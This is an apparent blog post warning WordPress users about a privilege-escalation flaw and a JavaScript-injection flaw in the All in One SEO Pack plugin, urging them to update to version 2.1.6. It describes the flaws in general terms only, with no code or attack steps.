In recent news, it was discovered that those who use the WordPress All in One SEO Pack plugin may be putting their websites and computers at risk. Two highly dangerous vulnerabilities were found, and these may also have affected the search engine ratings of the people who have used them. Thankfully, a solution has now been found, but a number of people are believed to not yet have implemented this. In a time when we are constantly being confronted with more and more complicated hacks and security flaws (such as the recent eBay password scare for instance), it cannot be stressed enough how important it is to check your own SEO plugin and make sure it’s fully up-to-date.
What Is the Plugin?
The first thing you must do is figure out whether or not you are actually using the All in One SEO Pack plugin.
The “All in One SEO Pack” plug-in automatically optimizes WordPress content for more efficient indexing by search engine crawlers to achieve a better ranking in search results.
WordPress has released statistics that demonstrate that this is one of their more popular plugins, as it has been downloaded at least 18.5 million times. This means that if you have a WordPress site and you are engaged in SEO efforts, it’s likely that you have it yourself.
Two Security Issues
Two separate security issues were uncovered. They’re both significant, but when combined, they pose a real threat to the safety and security of the website itself, and they can also greatly affect your page rankings and domain authority, generally not for the better. The first major flaw revolves around dashboard access.
In the first case, a logged-in user, without possessing any kind of administrative privileges (like an author of subscriber), could add or modify certain parameters used by the plugin.
Some of the things that people would be able to change include the keyword meta tags, the SEO description and the title of the post itself. If someone wants to use this maliciously, which is generally the case, then the page ranking of that particularly website could drop dramatically. Unfortunately, malicious people scour the internet on a daily basis trying to find these types of flaws, which means that some websites have indeed suffered in their page rankings. Indeed, even when access was granted accidentally, damage could be done as the user may not even realize they’re making changes.
Some would say that this issue is annoying, but not dangerous in any way. After all, the only thing that can really happen is that the page loses a little bit of authority and this can be restored again as soon as it’s identified. However, the second flaw that was discovered makes the issue far more significant. The second problem has to do with the ability to actually add malicious Javascript to an account.
This means that an attacker could potentially inject javascript code and do things like change the admin’s account password to leave a backdoor in your website’s files in order to conduct even more “evil” activities later.
This could have far more significant issues for a website owner. They may no longer be able to access their own accounts and be completely powerless against any changes that are made on their site. Their page and domain authority could be lost, and all the SEO work they have done would have been for nothing.
WordPress Community Response
WordPress was shocked to hear about the security flaws and immediately got to work on remedying the situation. After all, the plugin was designed to help people be successful in their SEO efforts, but the security flaws meant that they are actually getting the complete opposite. They paid particular attention to the privilege escalation bug, which is the second issue that was uncovered, as this is the more important flaw. Fortunately, they have been able to fix the problem and have released version 2.1.6 within days after the security flaws were uncovered.
Semper Fi was quick the [sic] patch the issues. It pushed out a fixed version, 2.1.6 that addresses the Sucuri issues along with a handful of other bug fixes reported by users in the company’s support forums.
If you are using these plugins, all you need to do is log in to your dashboard, navigate to the plugin through your admin panel and click “update”. If the damage has been done and you no longer have access to your own site, you must contact your web developer straight away to have this issue resolved and regain access to your site.
WordPress is one of the most popular CMS software in the world. Because of this, they are under almost constant attack from hackers and other internet specialists who simply want to point out flaws. Luckily, they have an excellent team on board themselves who are actually thankful whenever a flaw is uncovered, as it gives them the opportunity to fix the program and improve it, making WordPress even better.
Many people use their software because of how well it’s developed and how it offers such easy SEO options, which normally take a great deal of time and money to do. They choose plugins rather than paying an SEO professional to optimize their website. Since the latest security flaw in some plugins, it’s expected more people will start to veer towards professional SEO services again, as this gives them more security that their page and domain authority will remain strong.
Recent research demonstrated that some plugins within WordPress community can be unsafe. These plugins are, on average, downloaded may thousand times. Furthermore, WordPress has had multiple high profile attacks to deal with lately. However rest assured, WordPress has a great community of web developers and programmers that are qualified to tackle any of these security issues. No software on the market is free of hackers and people looking to exploit their work. WordPress and its community however has been doing a great job for many years addressing issues as they arrive, and are continually improving the software and the plugins they create. WordPress is still and will foreseeable be the best CMS software for building and maintaining websites for years to come.